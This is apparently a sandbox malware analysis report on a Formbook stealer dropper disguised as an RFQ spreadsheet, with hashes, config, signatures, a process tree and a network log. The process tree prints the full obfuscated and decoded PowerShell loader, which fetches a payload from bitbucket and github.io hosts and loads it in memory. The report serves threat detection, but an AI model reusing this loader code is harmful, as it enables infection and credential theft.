Overview

overview

10

Static

static

1

RFQ Order ...ls.vbs

windows7-x64

8

RFQ Order ...ls.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 13:10 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ Order PT502818.xls.vbs

  • Size

    13KB

  • MD5

    2bd4b9968087610996ce5ebf4d54daf7

  • SHA1

    765b890da74d5abefcee81d348eca4b02532bb63

  • SHA256

    bd3a12a40c2387cebef93cb3030ebcf879e43683424069898e5a0053100787fa

  • SHA512

    3b8f414b02842bc1216bd59b442cbf9f0292bb8aa083f37d8e6c624500e1688cb9159d69481f5da86733a5db90ed7f5b21e91e51a151fe6b274ba2b9b10f0b9f

  • SSDEEP

    192:UK222222222222222EBtqYtYzXpo490mqLOqx9dtE17cyv4wCxe1evzzR9pzhycK:NtOAdso8arZFmcZ80f2N

Score
10/10
formbookmtpidiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

mtpi

Decoy

jpsjlpszv1emibow.cyou

iyfeszfot8zdkmkb.cyou

adutils-e2e-test3-4357742.zone

protecttech.shop

atneb.autos

exclusivepiscinas.net

jan-aadhaar.shop

absorbalineraquatic.cloud

warehouse-092.today

authme.now

lekido.tech

etimestrips.store

astilbeastiteaubades.cloud

5335588a59.buzz

nw01erf.pro

tokenpool.xyz

b2cstore.net

emiuniv.online

yylmhzt.xyz

jessicabyheart.store

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook family
    formbook
  • Formbook payload 3 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3424
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ Order PT502818.xls.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:5528
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@bQBB@H@@QQBn@GI@ZQ@v@G0@bwBj@C4@cwB3@GE@bgBv@Ho@YQBt@GE@Lg@x@C0@d@Bz@GE@ZQ@t@HM@dQ@u@DM@cw@u@DU@MgBh@Gs@ZQBs@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.mApAgbe/moc.swanozama.1-tsae-su.3s.52akel//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5196
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:5052
    • C:\Windows\SysWOW64\cmstp.exe
      "C:\Windows\SysWOW64\cmstp.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4684
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5372

Network

  • flag-us
    DNS
    ofice365.github.io
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    ofice365.github.io
    IN A
    Response
    ofice365.github.io
    IN A
    185.199.108.153
    ofice365.github.io
    IN A
    185.199.109.153
    ofice365.github.io
    IN A
    185.199.110.153
    ofice365.github.io
    IN A
    185.199.111.153
  • flag-us
    GET
    https://ofice365.github.io/1/test.jpg
    powershell.exe
    Remote address:
    185.199.108.153:443
    Request
    GET /1/test.jpg HTTP/1.1
    Host: ofice365.github.io
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 5747868
    Server: GitHub.com
    Content-Type: image/jpeg
    permissions-policy: interest-cohort=()
    Last-Modified: Thu, 30 Jan 2025 07:59:39 GMT
    Access-Control-Allow-Origin: *
    Strict-Transport-Security: max-age=31556952
    ETag: "679b316b-57b49c"
    expires: Tue, 25 Mar 2025 21:11:14 GMT
    Cache-Control: max-age=600
    x-proxy-cache: MISS
    X-GitHub-Request-Id: CE92:1DCC28:134B032:13816C9:67E31998
    Accept-Ranges: bytes
    Age: 0
    Date: Wed, 26 Mar 2025 13:10:37 GMT
    Via: 1.1 varnish
    X-Served-By: cache-lon420094-LON
    X-Cache: HIT
    X-Cache-Hits: 0
    X-Timer: S1742994638.604465,VS0,VE91
    Vary: Accept-Encoding
    X-Fastly-Request-ID: 286a641a26220a1436fcf5d62d4311163d8dcb22
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
    13.153.16.2.in-addr.arpa
    IN PTR
    a2-16-153-13deploystaticakamaitechnologiescom
  • flag-us
    DNS
    Remote address:
    8.8.8.8:53
    Response
    153.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-153githubcom
  • flag-us
    DNS
    leka25.s3.us-east-1.amazonaws.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    leka25.s3.us-east-1.amazonaws.com
    IN A
    Response
    leka25.s3.us-east-1.amazonaws.com
    IN CNAME
    s3-r-w.us-east-1.amazonaws.com
    s3-r-w.us-east-1.amazonaws.com
    IN A
    54.231.235.98
    s3-r-w.us-east-1.amazonaws.com
    IN A
    16.182.72.138
    s3-r-w.us-east-1.amazonaws.com
    IN A
    54.231.201.242
    s3-r-w.us-east-1.amazonaws.com
    IN A
    3.5.30.248
    s3-r-w.us-east-1.amazonaws.com
    IN A
    16.15.184.197
    s3-r-w.us-east-1.amazonaws.com
    IN A
    16.182.38.186
    s3-r-w.us-east-1.amazonaws.com
    IN A
    16.15.193.102
    s3-r-w.us-east-1.amazonaws.com
    IN A
    16.15.178.169
  • flag-us
    GET
    https://leka25.s3.us-east-1.amazonaws.com/ebgApAm.txt
    powershell.exe
    Remote address:
    54.231.235.98:443
    Request
    GET /ebgApAm.txt HTTP/1.1
    Host: leka25.s3.us-east-1.amazonaws.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    x-amz-id-2: aG8jcNcT+HpOSMD4cjfujTlQ7BzfBih19Re91RVZCJQGF+0aUeQR9memiWZpMosP0MAyJt6LdEM=
    x-amz-request-id: 275DV8R17VY2F01H
    Date: Wed, 26 Mar 2025 13:10:42 GMT
    Last-Modified: Tue, 25 Mar 2025 21:10:42 GMT
    ETag: "89b08e4a7b5e17fd76017e105d27671a"
    x-amz-server-side-encryption: AES256
    Accept-Ranges: bytes
    Content-Type: text/plain
    Content-Length: 268028
    Server: AmazonS3
  • flag-us
    DNS
    tse1.mm.bing.net
    Remote address:
    8.8.8.8:53
    Request
    tse1.mm.bing.net
    IN A
    Response
    tse1.mm.bing.net
    IN CNAME
    mm-mm.bing.net.trafficmanager.net
    mm-mm.bing.net.trafficmanager.net
    IN CNAME
    ax-0001.ax-msedge.net
    ax-0001.ax-msedge.net
    IN A
    150.171.27.10
    ax-0001.ax-msedge.net
    IN A
    150.171.28.10
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239353595219_1EGLKLHZ1AZFLS6F4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239353595219_1EGLKLHZ1AZFLS6F4&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 586896
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 74F4C8F4F525481EA0C927E4D9A1F659 Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:13Z
    date: Wed, 26 Mar 2025 13:11:13 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388084_14BR1HNZO7MDFJS4B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 818674
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 645B62C314D54C7EB7F0F2EBB8DF5397 Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:13Z
    date: Wed, 26 Mar 2025 13:11:13 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239353595220_1KBZRW36PLPFPT43I&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239353595220_1KBZRW36PLPFPT43I&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 790945
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2BC6D40CE6B84A76BCE16675C052DD60 Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:13Z
    date: Wed, 26 Mar 2025 13:11:13 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239360432410_1ZT9L3WG863INPZDE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239360432410_1ZT9L3WG863INPZDE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 435187
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B545E727EED945B6B791E138EC99002B Ref B: LON04EDGE1222 Ref C: 2025-03-26T13:11:13Z
    date: Wed, 26 Mar 2025 13:11:13 GMT
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
    Remote address:
    150.171.27.10:443
    Request
    GET /th?id=OADD2.10239339388083_1LK8GG0XUINT2UANS&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 705144
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
